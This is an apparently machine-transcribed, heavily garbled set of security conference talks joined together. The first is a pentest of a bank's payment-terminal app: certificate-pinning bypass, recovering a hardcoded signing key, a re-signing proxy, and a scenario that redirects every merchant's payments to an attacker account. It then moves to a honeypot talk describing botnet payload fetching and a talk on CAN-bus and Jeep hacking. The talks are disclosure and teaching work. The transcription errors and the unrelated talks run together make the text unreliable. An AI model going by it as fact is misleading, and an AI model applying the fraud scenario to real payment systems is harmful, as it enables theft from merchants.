but if someone is interested, he will read it. In general, to make this function work, we have to do attack-manage-middle, i.e. we have to install a CA certificate to the device, because decoding is not good, but we can appear inside, force it to connect with us and then we can start to do it again. But to do it we have to have either a certificate that we don't have or our own certificate generated by our own CA and we have to add it to the device. And this works at the level of the operating system device. So with this operation, if we add the CA, if it is trusted, we can do something like that. So we have to do it
to make the boot work. And this is quite standard. The second thing that was required was Certificate Pinning, which is additional security of the application. Most of the better applications have a high level of security, but here it is about Not only the certificate is checked at the operational system level, but inside the application we have information about the certificate. So even if the operating system modifies the user, It also depends on the configuration of the device, whether it can do it or not. But even if the operating system is modified and a certificate has been added, the application itself checks it again at the application level. And to do this, you also need some magic here. But we have the tools ready for this,
we have this Frida. It consists of two parts. We install it on the phone or on an Android device, the other part on the computer. And then we can start the application in a mode that will check what are the security features, because there are many ready-made solutions offered by the setting. When we start it, we can see which of the pinning systems is used. Here we can see that some transmanager was used. You can't see that for this specific domain, which is there, it is used only as a pinning. And this is generally such a tool, we just open it from the box and it works. And now, if we have this pinning certificate, we will also go around, we can
actually observe what this application is sending. If the terminal was running, the first request that was sent to Damian was logging. That's what it looked like. Now let's take a closer look at what can be seen in this logging. First of all, the terminal logs with the two information we have in the contract, device ID and license ID. These are the two things that we give as a login and password. The second thing is that you can see that there is no VPN here, there is just a completely public hold that it is connected to. It connects to SSL, here there were also questions whether there was any client certificate. The second thing that we can notice is that in this login address we
get something like a secret key. We don't know what it is at this stage, but when we write down the whole communication, pre-transaction, etc., nothing more will appear. This is something that you can't see, you can only see it when logging in. It's not obvious what it's for. The second thing is that here, maybe it's easier to see in the first slide, we don't have a session anywhere. We log in. But there is no session, no KISS, no JWT token, nothing like that. It looks like there is no session used. Okay, and now. These data, you can see that we have these data here, these are the data that were explored later in this status panel, so when we log in, it returns us the detailed data
that we see here in this status panel. So that's where this information comes from. Okay, now what you're asking about. What we can see is that we have something like a signature. If we change something in this request with Rupiter in Burp, it doesn't work. This request is actually signed and this signature must be correct for the request to be accepted. But there is something like that. And now the question is how this signature is generated and where does it come from. So you had to look at some sources. I'm not sure whether I got a version that was not blurred. Sometimes when we have tests, we get two versions blurred or not. Whether it
was really production or not, I don't know. But even if it was blurred, these things are quite simple and it would be relatively easy to do. Because here it is not so complicated. And now, if we look at these sources, there was logging, so we have a logging class that we found and in this logging class, what can we see? We have something like this, here, this post data pack, so you can see that these data that will be in the post are somehow packed in such a string, And then we generate this signature. You can see that the signature is generated by the function get_signature and it has two parameters. These are the data we sign and here we have something we sign some key. You
can see that it is called post_config_get_pub_pitch. So we can look further in these sources where it is. It's here. You can see that it is hardcoded. The question can arise whether it makes sense that we have some key hardcoded. We'll leave it for a moment, answer to this question. But let's go further. How is this signature generated? This signature is generated quite simply. We simply have strings, we have all these fields that are in the request, which are signed, which are verified, and we have this plus sign. And from all this we have just hash_ash_accounts. I don't want to go into details here, but it's not... Bookwise, it shouldn't be like that, because it should
be just a count of hash. In 99% of cases nothing bad will happen. But for example, GnWal Convict had a presentation that shows that something bad can happen here. And here it is important when we add, at the beginning or at the end, what is this algorithm and it is also important what the data is. Because if this data If it was JSON, it would be worse. If we had, for example, simple system commands that are in the middle, we could add something if the lengths are appropriate to the algorithm. It's a small probability that something like this will happen, but it shouldn't be like that for a banking application. If someone wants to discuss
it later, it's better to do it calmly, we can do something here. However, at this stage, we have this key, we know how to count this signature, so we can fake the login, we can change something there at will, and if we are able to, we can send it to the server and accept it at this stage. Now the question is, why is the Secret Kit so important? If we look at other requests, for example, here we have a Print Report, so there is something further what this application does, we see that we also have, analogically, we also have data packing. We have generated a signature, everything is generic, we also sign these data, but
we sign with some other key. You can see that we have this "this.key", this "this" is here previously loaded and this earlier loaded is "getPrivateKey". So we can see that there was "publiKey", here we have "privateKey", which is something different. So now let's check where it comes from, in this class. So this class looks like this. You can see that if we download it, there are either some fake data here, or the value of this class is selected from the variable, and this variable is set by setPriority. And now let's see where this setPriority is used in the code. It's not a big surprise that it's used in the SaveStyleInfo class. So we can see that
we got this answer from the logging. This is parsed and inside it, when it's parsed, the get_cigarette_key is used. So you can see that what we got in the get_cigarette_key response, it lands here as the private key and it will be used to sign these requests later. And now the question was whether it was good or bad that it was hardcoded there. In general, nothing bad happens here, because with the first request we still have to enter the login password, right? So nothing bad will happen there anyway, and then after the first request we will get another key anyway and sign it again. That's why it's called private and public here. It's quite logical here and it's allowed to work like someone invented
it. Nothing bad is happening here. At this stage, we can sign all requests. The first and the next. If we can sign, we can change the data. We can also combine something in the group. But how to do it now? We can do it in Burp. When we go to proxy, we have these HTT_MATCH_AND_REG_REX_RULES. And there are static changes in regs. But we have something like a script band. in Java, and we can write a code that will just run and replace it. And we can almost copy the code that we had already compiled. We could put something here, we could also make strings, we could go to the hash corner and everything would work fine. And it worked for
me, but the problem was that These rules, they are intended for requests that are saved, everything works fine. However, when we have a repeater, it doesn't fit here. And there were also problems in the order of doing it. So it worked, but it was... It's not very useful for me to do it this way. It's more of an interesting fact that it's easy to do it in GURP. But in practice, it was easier to do it differently, so that the repeater worked easily. I just wrote it. I asked for some simple things in Python. It's very ugly, but it's also showing that this code could be very ordinary and it would be enough for attack. So you can see that there is a
server proxy written here, which will be using Getty Posts. We look inside, we look at the URL, depending on whether we choose the encoded one or some other one. I changed the name of the website. We count only the hash, and it's sent. It works very ordinarily, because even if we have the right answer from the repeater, it adds a header, the data is added twice, it works ugly, and it's just about showing that it can work ordinarily and it works anyway. And now how to use it? When we have this repeater, we can manually change where it is sent. So we could just change it to localhost, to these four eights, or to our program. So everything that came from the repeater
would go into this program, it would count this signature and send it on. When it came back with an answer, it would send it back. So it was a simple script that corrected all these signatures. So now I have a tool that I can change these requests freely. And now I started changing this log request and I was looking at what could happen there, what would surprise me. Because generally, when there are tests, you have to change something, see if something strange does not appear, what is interesting. So first I changed the device ID. I got several sets of these plugins for testing, I got two or three. So I could try with different ones. And now, if the device ID changed, then the
script was also different, it's logical, there's nothing strange here. What was interesting and a bit strange was that if I logged in with the same device ID, the secret key would always be the same on a given day. When the day changed, it was no longer the same. It was as if there was a random, but the seed of the random was the date. It was a bit strange. Everything was going well, but it was a bit of a question mark. Besides that, when you noticed what was inside the signature, there was also a timestamp. We suspect it was there to prevent replay attacks. So the idea was to insert it in the time. But the strange thing was that no one
checked if the date was in the future. So theoretically, you could generate a request that could be sent later and it wouldn't work anyway. I didn't use it, I don't know if there were any other dangers, but it was also strange. Okay, and now what was the strangest thing was this. Since I had a couple of login passwords, I mean, it wasn't a login password, it was an ID and a license number. When I exchanged them, it was as if another user gave a password to another user, something like that. It turned out that it worked. I was surprised at why it worked. First, it was completely illogical, but then I started to wonder, maybe it was about If we have one
shop, it has 10 terminals and 10 cash, someone decided that this license will be one, but you can log 10 terminals on one license. But it had to be paired somehow. I could change it at will and the logging would go. Which was strange. So they could do something like this, right? I had some license and ID terminals, these pairs, which could be logged on a cross, for example, and they were logged. And now I started to observe what was going on and how they were logged on the cross. When I changed this ID terminal, the secrets changed, right? Because it was already verified. On the other hand, if it was the same, it was
the same all the time. However, if I changed the license number, then the data in the status panel changed. And then the data of the store was shown, so it was closely related to this, and it was closely related to this. It depended on you. Okay, so this is the first perception. Now the next perception. I also got access to the administrative panel of the bank, where you could see the transactions that were entering the system, etc. And where the device ID was entered, the field was generally quite long, text-based. However, the data that I got, the example device ID, were all digital and had only 8 digits. So it was a bit strange, why is it possible to write alphanumeric values, but I don't do it. And now
what was even more interesting, when I logged in there, I saw that there were more of these terminals. And here we come to the interesting question: why were there more terminals? That's why there were more terminals. It was a test environment. However, it would probably be too expensive for the bank to set up a separate test environment for each test, so there was one test environment for various tests that took place on this banking system. That's why there were more terminals, because they were also used for testing other systems that integrated somewhere or whatever. So I could see what the other numbers of terminals were. They were all eight-digit, and it often happened that they appeared in a row. So it was weird, because if I compare it, if
it was alphanumeric, what would be the number of possibilities? And if they were only eight-digit, then we have 100 million of them. It's a lot, but not too much for a computer. So I can make it so that I can enumerate even all of them, if I learn a lot. It's doable, but if they are still close to each other, then I can enumerate them. So that's the second conclusion, how to count them. Okay, now with the session. I should clearly say that there was no session, because there was no bookies, no token, nothing like that. So here we have a question that shows us the history of the transaction on a given terminal. And now, what could be here instead of a session? Here were some additional headers,
but it turned out that it had no effect at all, it was completely ignored, the backend did not look at it at all. And you can see that in DQ-Waste we actually only have the DQ-Wise and DQ-Data. If it was like this, if a specific license was responding to a given device, then it could work on the backend. But if I could change it and another one would appear, then it means that... How did this server know which matchup I was in at the moment? There had to be a state on the backend, right? Because HTTP is non-standard, so there had to be some state. But how was this state taken? How, if there is
no session? So there was a session that didn't exist. There was no such "frost" session, but the status was written somewhere and it was a virtual session around the device, not the secret, the pair, on the backend side. It's like, well, by deduction, you can come up with something like that, that it had to be like that, because otherwise there would be no server-level possibility of returning the right data to the right match. So that's the third observation. And now, if we combine all of these weird things, we'll wonder how these sessions worked. I said that when I changed the license number, it changed to Merchant. This means that this license specifically identified a given merchant, a given store, for example. If
we logged in, it means that we were given the license number and when we logged in, the license was paired with a given session. We said that we have a virtual session that is not available, but before that session, somewhere on the backend page, it was written that this session has such a license number. This is how it had to work. And now we also know that the secret key changed only once a day for this device ID. So now if it was like that, what would happen if we re-logged? If there was a new logging, then in fact the secret key was the same, so the conclusion is that the session ID, our virtual one, doesn't change at all, throughout the day. Every time we log in
again, the session ID is the same. If it was cookies, you would have said right away, "Well, how? After all, when we log in, it regenerates the session ID, when we log out, it regenerates the session ID." There was no session ID here, so the session ID didn't suffer, because it wasn't about suffering. And now... The question is, what if we take the second terminal that would log in with the same device ID. The second terminal logs in, But what happens now? The previous one will be logged out. It was normally logged out because the session identifier changed or it would no longer be important. But since it doesn't change all day, it turns out
that we have a new device logged in the device ID, and the old one is still logged in. It's not working here. We do a request and see what happens. And surprisingly nothing happened. Why didn't anything happen? Why didn't anything happen? Because if we looked here at how it was logged in, the data from merchants were only sent during the logging. So, if the other person logged in, he didn't do a new logging, but he had it cached at his place, so they didn't change. But now, if we take a request with a dynamic history, for example, we have a history there, we do a repeat with the same question, device ID and some other license. And it turned out that the terminal
showed a different story. The story of this merchant with this license ID. Because we managed to change the merchant in the back-end session. We injected other merchant data. Okay, now let's try to combine it all into some cool attack. I'm showing it because it's nice to show how to attack a bank, but if I wrote it in pieces, in a report, they wouldn't do anything about it. Only when there is a scenario, someone will react, it's experience. So it's not just for fun, but also to make someone notice it. And now how do we have to prepare for such an attack? We are attacking, we just open a fake store, register a store for some post or something. For this store, we have to open a
bank account. And now, when we have this bank account and we have the store documents, we go to this bank, which we know has such a great terminal, and sign a contract for such a payment terminal. And as in this contract, we have to declare the number of our account, which they are supposed to transfer all the money that people will pay us. And we get the terminal, which is not needed there, we can not move it at all. We get the device ID in this contract, which is also not needed there, but we also get the license number. This license number is important because it is first of all paired with our merchant data, but in this log response, so that they don't see that
there is also an account number, but on the backend side there is also the account number that was in the contract. And now we're going to attack. We generate log requests, whether in Burp or in Kurlem. And now what do we have to do? We have to take our license ID, because it will be paired with our account number, and we go to all or only to our device ID. In general, it is not a problem to go to all, there were 100 million possibilities, during the day you can do it without any problems. And now, if we do something like this, all these terminals in the entire bank network, they still work, they were logged in and these sessions are still
running as they were. Everything is fine. Only that for each session of all terminals in the entire banking network, we inject our license number. So, in fact, we pair them with our account. And now, If Paravalism is our account, then any payment in any of the shops in this entire network is completely normal. Someone pays in the shop, gets the money, the shop sees nothing strange, everything is normal, the payment passes, but all the money comes to us, to our account, not to the payment of a specific shop, but everything comes to our account. And that's how it looked. And now, what were the consequences of what was going on with it? So, we attacked all the terminals of the
entire network, but not even touching them, not communicating with them, because we were only talking to Beckert. All the terminals were working perfectly fine. The only anomaly was that when we went into history, we could see our transactions, but we could also see other transactions, because suddenly the history became common. It was strange, but not so strange that someone would be very aware. If he wanted to check specifically whether the transaction had passed, then yes, it had passed, it is there. So that was the only thing that was visible, really on the terminal side. Bank administration, it just looked like it was done in our store. There was no trace at all that something strange happened here. What store was it? - A legitimate
store works. - Yes, a legitimate store works, but suddenly it has a lot of transactions. Taking into account the amount, I said that this payment system has a billion users, so interesting things could happen there. This bank doesn't have that many clients, but it's one of the big banks. And now, what else was interesting from all this?
I announced the similarities, they understood it, but later they said that there was a problem with the bookishness. It was a test system, but because it worked with different systems, because it was still not a provider, there were real bank accounts, real cash, but there were some cents, small amounts, but there were real accounts and real money. And now suddenly, the money was somehow mixed between the accounts, and we have no idea what and why, or how to reverse it now. It's nice that there's tax and so on, but you have to turn it around, because the accounting system is not able to do anything about it. It's on the tests themselves. To make it funny,
I said that these tests were common, that it was a test environment. Some transactions, some links, some strange things started to appear, because different teams tested different things there, and probably some integrations with completely different systems. So here, even though it was a test environment, it became a kind of a mess. So it was funny. But in the end, I asked them: "You know what, this URL was like this, maybe if I change it a bit and delete this test from the front?" It was a great scare. Why was it scary? It was suspicious because this application was not the first version. There was already some version, it was tested. They just changed something there.
That's why I got it for testing. So the authenticity was already there on the production and it would be fun if I just took it off and it would probably be very fun. I mean, I would really have to guess this Merchant license, but it's doable. Well, strange things could happen. You probably got it on Mail, right? I don't know, but it was... Maybe it was a test? Even on the test one, there was a problem and the real money was so confused that it had a big problem. And I had to do all these transactions later, just make a return. It was the only option, you had to return everything and then it returned to such a state. That's it, if there are
any questions, I'm sorry. I don't know, because it's not true, honestly, because there was no need for it. I mean, he wasn't able to check if it was invalid, because there was a signature that wouldn't fit, that would be a bad signature, because it would be a key to sign something wrong. It's a hash, you can't check what it was signed with, you can only check if it's signed correctly. So, it's a bit of a misrepresentation. I'm not really afraid to check it, because it's hash, so we can't check what was in the hash, maybe it's good, because it's the same as we signed. You can hash it again, because it will be more tempting to check it. Yes, there is a link between
the invalid and the public. So the names were private key and public key because you allowed the presentation to be published? Or it was actually legal? Because there was nothing in common with the public key. In this sense, there is nothing in common. But if we put it this way, in this sense it is public, so that's why it is coded and that it is legal, that it is coded because it is public. I often came across this, that something was called, so that when someone quickly looked at the page, It was only in the first request that I have to know the other data. But it's still not asymmetrical. Yes, but there is no such thing.
In this sense, yes, it makes no sense. Only someone pointed it out so that it can leak out. That's why it's private. Only then there is an audit, someone will find out if it is private or public. And this is another thing. Maybe they called it that for their own internal reasons. But the logic is that it was... We agree that it may leak out. It means that security is not based on the authenticity of this thing. And there was no such thing here. What is it used for? It was just about the ability to pass all requests through the same code. The first one passed through the other, and the second one only passed
through this one. Well, not exactly, because you still have to submit the data here, right? Because you still have to submit good data, because it doesn't change much. If you didn't know them, it wouldn't change much anyway. Well, it didn't change much, but... Well, generally, it changed a lot, but it was just a danger. Let's say so. I wonder how they got there. I don't know, if you have time, it's still a matter of these... This hammock and hash. The same question: why was there a nonce if they don't use it? I don't know. Maybe it was for the sake of it. I don't know, I have no idea what it was for. In the
search time, the functionality of the shortcut function based on the method of the Vanguard is that if we know the value of the function for a row of characters and we know the value of the row of characters, we can calculate the value of the function of the shortcut for the row of characters plus something we are able to calculate, the row of characters we control. Yes, but it's also about where we write the key. If we write it in the front, we can add another iteration. For example, here we have MD5. In MD5, the state is... We can't write something that is secret. Exactly. And if it's at the beginning, in some cases it's like... The hash is automatically the beginning
of the next iteration. We can add another iteration based on the hash we already have. We don't need the front, we just add the back. We just need the data to match the blocks. That's one condition. The second is to add. If we have a form of data in the middle, like JSON, and we have an appendix, then we'll get garbage. But if we have something we can add, - Something like that. I don't know if it's called that. Anyway, we can use this hash... And when we have a hammock, it's a bit different, because we divide this key into two parts and we do two hash first at the beginning, and then the second part at the beginning. And the division is chosen in a sensible way.
We do this to separate the key and it's chosen according to the method, so that it works in a sensible way. It's called the extension. I don't know what it's called, I know what to do in practice. It's a good approach, no matter what the name is, no matter how it works. I'm sorry, I'm not sure what you mean by that. I think the best person in the big area would be here to explain it exactly. I'm not sure. So, generally speaking, making a signature based on a hash of the Nesting glue is not a very good idea. It's not very likely that something will happen, and if something happens, it's not good. Well, I don't know, maybe there are some questions. At
first, there are some kind of bullshit. Then too. So, welcome to my presentation. My name is Jupot, the aggressor is Ponypot. My nickname is "Kryptowski" and I've been a Kryptofan fan for over 30 years. In addition, I deal with UNIX, networks, their destruction. I have been dealing with electronics for almost 30 years or even more. It is a micro-optical project and it is made in my free time. The presentation is not for my employer. I tried to recognize it in one way or another. And how he will recognize this honeypot, we will see how he recognizes it. And I found out where this term came from. If someone knows, then probably they will know. And does anyone know the first Align
with Perfect? Does anyone know this publication? There was a first publication about something that was later. The guy did something that emulated services that were popular at the time, namely, the Selimay, with this hole, which was also FTP, GDEMON, some account, the possibility of logging on the Internet, he set up an account there, and he was still there until 1991. And there is also Kukusek, a 100-year-old clipart, which probably some people read. A very nice book. She, clipart is also a football player, and she describes the event from 1986. The guy just had a guy, someone entered his network on his Uber, and he actually did from that honeypot or what the attacker is doing there. And even did something
like that, that he put some fake documents there, some fake actions, because he puts with these actions, then someone tried to contact there. Now we would call it a panic token. In any case, it is totally nothing new. Does anyone know PHF? Yes, yes, yes. And everyone is smiling, as I can see. Those who know. This is a script that was made in the former server of the NCSA www, and then in Apache, which was created from it. It was a script that showed how CGI scripts work. It was a demo of a telephone book. And this demo of a telephone book was very good for making comments on servers. But interestingly, when the tax came out, it was
probably done together. Okay, now the question is what services. Well, there are such things. And maybe we would also put some of these things, for example, database in the Internet. Such a little more, well, it rarely happens that some Kubernetes, Docker, such things are also put out by people. And maybe something even more exotic, like Minecraft server or Asterisk, for example, a VoIP server. We could also have some proprietary interfaces, some unknown protocols. Why limit ourselves to only display what could be on some Linux, for example, or on some PC or server equipment, because we could, for example, display some IoT. some letters, cameras, all those things that are now being used. And there is no need to separate the system, because maybe Linux, Windows, right? And
it's best for various architectures, CPUs. And it's all cool, but it's just not realistic enough to do it all. And basically, at this point we can end the presentation, because we can't stop it. It's impossible to emulate all of this. But, maybe we won't end the presentation. Do you remember how these worms worked? We have a Ternet server on some exotic IoT platform, for example, We have a Waka that can attack this type of things. It gets a remote code on our IoT device. I will make a clip-up of some tools there. And here is an example of a session. This is a dump. So, we log in, you can see from some settings, how the device is set up, from which the client will
connect to the server. He set up a login prompt, he got some user, in this case, he entered some password, and then he got, he actually logged in, and because he is an RM user, he does RM. And that's it, we see the whole session. And here, a quick demo.
Here it connects to our attack, to our honeybot, and it logs in. And it makes a command. And we can watch this one, this one, and we can observe our session, for example, For example, what does Miraj do? He will look for a catalogue in which he can write. Then it will try to pull some kind of a buget, or a DFT, or a curl. Whatever is available on the DFT or a curl. Whatever is available on the device will try to pull some script and then it will try to do it. If it doesn't work, it still has a form that it is able to create a catalog with echo and then run it. And we, our
Mr. Potniwe, how to enable the internet, and we caught it and then we can analyze it, for example, report it to the website. And what devices, just looking at the telnet, it's just a very short list of what we managed to identify, for example, on the wires. However, there is much, much more of it, whatever, right? I mean, some routers, some cameras, only cameras, some epithelium, epithelium, everything. And now something different, something that hasn't come to us yet, is the interface that manages Asterisk. And here we can also observe what the attacker does. In this case, he adds the number of the agent in this center, to which the call will cause the command to be made. And there the
command is on the same goal. Again, it is dragging something on the block. Of course, all these sessions are shortened, but then there is a call attempt from the Asterisk interface. We can see what's inside, here's some controlled mod. And again, Ponypod doesn't know how to emulate Asterisk, but we can get it. Ok, something more exotic. There are a lot of attacks on Redis, in the sense of Redis servers that will attack you. Here is an addition to the scheduler, the execution there, well, there is something encoded there, it is 64 and then it is re-arranged. We can of course encode it and see what the attackers want to do there. And there are many other variants of this. In this
case, it is most likely a campaign called Petra. And here is a presentation of this campaign. This is something else. This is very active. This is a question from the doctor. and here is the open doc in the Internet and someone here does with some antenna with a nice Nux and then it will be encoded again some kind of screen, also encoded with a shell. We can also see what it is. There is a lot of it. People only put the characters out, and then others take them over and use it, firstly to find, to propagate further from some of their own robots, but there is also a lot of work done there. This is just what the instamillator does, it takes the script from
the Tor and then puts something there. And again, this honeypot absolutely does not know how to emulate Redis. but still we can see what the attacking robot is doing. And something even more strange, some device has an ADB set up, Android Internet. And here you can see that someone is connecting to the ADB, trying to make some kind of a call or a call-me-u-f-o-miner, is looking for a process called Trinity. This session is much longer, but this is the campaign called Trinity and here is also a link to the description of this campaign on the website. And again, my phone can't emulate ODB, but it's very cool to watch the whole session on it. And there's a lot of it, so I'll show you
everything now. I can't catch some things well at the moment. And that's mainly RDF. I would have to put something there that records RDF. SQL Server, I have to implement it. And VNC is not available either. I used to do it, but I don't remember the ports. So now the question is how to use TLS? I said I was going to pass everything byte by byte, but I lied. Because in fact, you can... At the beginning of TLS there are three main features. As we can see, you can just use the SSL API and make a simple attack on the reference. And then you can see the data. Most of these robots don't check certificates.
So there is no problem. Now the question is what about SSH? SSH connection starts with a magic bike. If I find it, I'm running something called SSH-MD, which is a very nice project for making a domain name for SSH. In the previous version, it was necessary to modify it a bit, now I have it without modification. from the day before yesterday. We are practicing the movement, it is not a very popular thing, but it works. And it records the proposed keys, which is cool, because sometimes people do scanning where a key will enter. They use the password. And the sessions commands Demo So, Here we can see the SSHMD, but we can also see the user and
password. We can also see the session as it was. Here we have the commands that have been sent. Here we have what he got back to his terminal. Unfortunately, I'm not sure about that, but you can see what was sent there. Here you can also do something that you absolutely shouldn't do normally, so you can just write it out on the terminal and the terminal will interpret the ANSI sequences, so even the color is the same as what it was there. These were the differences between the system processes. SSH is a very interesting topic. If you look at the sessions of users, there is an actor who tries to use... These are not some passwords
for IoT devices, but it's just a long password. and it can actually log into the machine. This is something that I saw for the first time and they were not even published in the Internet. At the moment, there are some logs from the Internet. I'm going to skip it now, but it may be a nice topic for the future. And now the question: do only worms get into it? No, because there are some examples of scanning the Internet, some Internet of Things and so on. And there are also real people who are defying it. We have these scripts for parsing it, so in fact, it could be sent to some friendly Polish institution to watch such blogs.
Toodoo is a project I wrote and then I didn't deal with it much, so it's in a beta version. There are a lot of things to fix, it's just a bad thing. The worst thing is that it's written in C, which is not fashionable now. It would be useful to add support for other protocols, for example to MS SQL, which has a lot of them. I would need some reporting tool, maybe someone would send me a request. And now the question is what has changed, how has it changed over time? I started it more or less in the last year and when I started it, there were a lot of vilains, but a lot at the most. In June,
as I showed it on Confidens, there were many less people. Either it was the end of the campaign or I have other ideas what could have happened there. There were still many dockerers. The campaign ended with SSH logging in with other messages. The campaign with Redis also ended and there were generally fewer connections. I was wondering that maybe this IP is already burned and maybe I should take the next one. And I took the next one. Just two days ago to see it. And two days ago I improved the SSH service, so now you could watch the transfer of the PICs. And that's basically it. We can sum up that this is a new type of halopota, we call it honeypot, corn,
and beets. Now, yes, it will be a little bit more complete presentation than before. It will be a presentation about automotive cybersecurity, which I started to be interested in some time ago. It was actually the first public presentation, because this presentation was published in CETA Online, in various formulas of CETA Online, in various formulas of VOD and at the most famous conferences. And I wanted to talk about these terms, definitions, - The fastest way to reach the maximum value is to use the diagnostic mode. The frames have their own frequency. They have the lowest value and they are treated in a period of time. is so processed that in front of the frames that concern whether
the windows fogged up and other sensors, these frames are treated with safety in the first place. This is an arbitrage frame, quite important, sorry, in the arbitrage field and the field of data in the standard CAN which is still used in motorization, even though we have the more modern CAN FD. CAN 2.0 is the classic CAN, it has 8 bars and 4 bits. So here is an example of what a This is a frame where we have the identifier and then the whole framework comes in. This is not allowed to have too many technical limitations. So, potential attacks, which we will show, cannot be refined, because these data cannot be shared. If we want to share these data within Playroad, we have
to use a little higher, more advanced protocols. e.g. car Ethernet, which can be used, or we know how to use it, or we know how complicated data are in our cars. So, KAN doesn't deal with them, it has limited bandwidth, and what it sees, I don't know. For example, the infotainment system. We can see how fast we are going in the car. They also read the frame of the engine. Anyway, from the ECUs that are responsible for these hard elements in our car. And after decoding, you can potentially read that there is this type of information. Speed, brake status, and steering angle. So these are the restrictions of this protocol. Of course, in the modern
train, there were not only CAN, there were also other lines and all of them in the network, in the computer network, they usually connect with one system, with one gateway. It's basically a switch for the car infrastructure. And we see potential problems, that the unhappiness gateway connects with the dashboard, and so on. and in addition to these comfortable cams, the steering wheel is used, but also the lower wheel arches, all of these are comfort cams, comfort beam, they are also more competitive with the engine, transmission and safety systems. So if it's not well segmented, like in a telecom, we have potential gaps in the time. Some researchers from Malta made a POC on BMW 3 series, a classic
BMW, fast, cool car, and they thought they would use a simulator of the vehicle's operation, i.e. a K-frame generator. You can find a lot of such solutions on GitHub, phaser, and they started this simulator They were writing standard frames, which are written as part of the KAM highway. But as part of this pseudo-highway, they also installed an external device. And it was an Arduino, a microcontroller. It is also used in motorization as a component of ECU - electronic control unit. ECU is the most important vehicle in all functions. They introduced such a left ECU in the lab environment and this information was sent to the main ECU responsible for what we see on our dashboard. And they made
two scenarios. One scenario is the first one, with the H button, where the frames that were coming were modified. I showed them 24 km/h. They were changed. And when the frames were changed, This dashboard, without checking any end sums, identifiers, or other levels of authentication, just accepted everything and posted it on the screen. It was real from BMW's SEVICS. Real, in Polish. The second scenario is also interesting. ECU which is connected to the dashboard of the data in the highway and it just didn't receive data, for example, related to airbags, ABS, they just didn't reach it, so a timeout occurred and it just made a mistake. So if someone has access directly to the highway, and some of the ECU,
apart from the fact that we are The first factor is that some of the ECU or these codes, to do something. We will discuss it in the example. Generally, in Magistral Lint, these slots will never work by themselves, because they are being used, but some can also be used by other individual slots, if they are programmed for them. Here we will have such a deal with such an attack. In the data field, it is good. Here is an example of reality. We have here a master and two slaves. The master will control the lift engine. How does it work in a car? Try the buttons. I don't know if some of you have a kick. I'm thinking about such a car now.
For your entertainment. The window button is the slave and if it gets a frame from the master, it asks it what button is there, and it will say "discard". Only when the information returns, it is sent to the actualization and the window is discarded. Simple. Another important thing. No external forces cause communication in the opposite direction to the CAM. Because in the table, the communication from the master and the response from the slave are also in the whole harmonogram table. So at the stage of vehicle construction, they must be programmed. Of course, every millisecond, the slaves are asked. And similarly here, of course, in the case of a lock, when the door is opened, the door is opened. And
something happens, the fact that a physical change occurs, it is a signal to the actuator. There was a Japanese study, where they tried to study and understand the feasibility of the mine. It is interesting that in this study, the answers were changed to the announcement of the mine by the master. And what's the point? In fact, incorrect or, well, actually, wrong information about this harmonogram was injected. Causing that when the slave responded to the master's question, he responded in this way, it was injected, this answer, It was very difficult. She flew to the highway and Slav, who also sent answers to this slur, did not send answers to the specific master. And now this is
one of the scenarios, that such false information can be shot down, block the traffic or replace it with a false traffic. The researchers found that although the CAN is a highway that is responsible for comfort in a car, in vanes, the CAN is responsible for the sliding doors. . connected to the Internet and can be updated by the network. We can see here that there are different types of ECUs, both those responsible for the entertainment, those that are concerned about the pressure in the exhaust, those that are related to our engine, the running day, And the most famous case is the hacking of the Chiroki chip. The case is important from the point of view of the topic, because
it was the first public demonstration that it could be done at all in 2015 or 2016. Two researchers at the American Black Hat presented the whole concept and explained that it is possible. In the GPC Rocky, there was a head unit with infotainment. This infotainment was based on Linux system and it was enough to have only IP address of this car. This is the IP address of this infotainment system. If we knew the IP address, then we could Of course, there is a password, but it was generated based on the first start of the vehicle and it was a description of the date of the first start of the vehicle. So if we knew the date of
the first start of the vehicle, then the brute force was much more narrowed. and not the fact of brute force, but just to check what the default password might be. So, it's a simple thing. Unfortunately, between head unit and ECU, responsible for various critical functions, it was the ECU, the RENESAS, there was an open port, which was immediately used. It turned out that within these types of connections, these magistrals, There are no additional security. If we have reached the head unit, we could go to other elements of the network, to the magistrate, to other ECUs. You can find a video on YouTube, I will not display it. The attack was shown live. during the movement of
the vehicle, the engine stopped, strange things started to happen on our infotainment system, The music started to play louder, and the whole vehicle was taken over. And here Chrysler had to return 1,400,000 vehicles to the base of the importer to make this car a history of motorization. This is an example from the film that the hackers made available. and they actually reflect their similarities on this system and on this port. And earlier, as I mentioned earlier, we have to pay attention to the safety of this port. It may be that the devices that are, so to speak, . um which show how it is possible to change such a diagnostic device into such a device, such a station that will infect
the master and infect our vehicle. This is the most critical point. Of course, you know how it is. We need something for cars. The most critical facilities are those that, If we have a computer system and we have access to the computer, then we will sometimes rely on the open ports of our desktops or laptops. It's the same, of course. - Please, for electric cars, are there also charging plugs, but not the ones that are there? - Yes, yes. - I don't have a choice. - Of course. Maybe I'll just mention it in a moment. um I don't know. It's a kind of industry where, ok, something is slowly changing, and there are organizations that take care of security, but you know, it's not a priority. So
far, it's not directly related to the passenger. It's a stupid thing, but if I stand next to your car and try to connect, even if he tries to connect, he will notice me, he will even display this string, he will crash it. This is also a hand unit. As we know, currently, if there is no modern car, I would like to add a vector to my visual. And it's not really useless, in my opinion. Look at the supply chain and programming. There are some third-party libraries, subcontractors who write code. All of this suddenly becomes very complicated. And the identification of these risks in each of these specific points is simply difficult. We know that in supply chain attacks, incidents are really at
the top. Especially in the case of these software-defined vehicles, where at the end of the road there is our programming in the car, at the level of the involved. We know how creative teams can be, So, this kind of things are definitely being studied. Over-day update is quite critical in this context. I do not tolerate statistics in the security sector, because they practically do not say anything about it. Also, the thesis of Automotive Sabres is confirmed. I do not believe that suddenly in 2021 and 2022 we had such a jump when it comes to new, invented vulnerabilities. I'm just showing it so that it does not converge with this source. It would never agree with the data that is currently available. There are companies and organizations that
are studying the current values in cars and practically all of these values are either due to the threat of the delivery car or the integration with the higher standards in various cases or from the threat, also in a smaller degree, which are based on the perception of certain functions in the vehicle. So these are the current trends. And when it comes to areas, the most dangerous are cloud and onboard, so what is in the car, and not some attempts to hack the film as such, so that it would later affect the safety of the car. We will also talk about this in a moment. This is a cool rap that shows this problem well. The search engine is a kind of ASRG,
